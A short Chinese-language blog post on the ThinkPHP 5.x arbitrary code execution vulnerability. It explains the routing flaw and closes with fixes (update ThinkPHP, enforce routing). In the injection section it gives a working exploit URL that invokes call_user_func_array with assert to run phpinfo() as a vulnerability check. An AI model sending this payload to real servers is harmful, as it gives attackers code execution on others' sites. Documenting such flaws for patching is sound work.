thinkphp任意代码注入漏洞

@admin  May 11, 2019

0x00:前言

2018年12月10日中午,thinkphp官方公众号发布了一个更新通知,包含了一个5.x系列所有版本存在被getshell的高风险漏洞。

0x01:原理

漏洞主要原理是
| 触发执行任意命名空间下的类

比如:
| http://127.0.0.1/index.php?s=/index/thinkapp/index

请求之后,会提示

| thinkApp->index()不存在

也就是说,他会把请求解析到think底层类触发方法;

0x02 注入

注入代码
| ?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()

如果返回phpinfo();
说明此漏洞存在

0x03 防护

1.更新tp
2.开启强制路由


添加新评论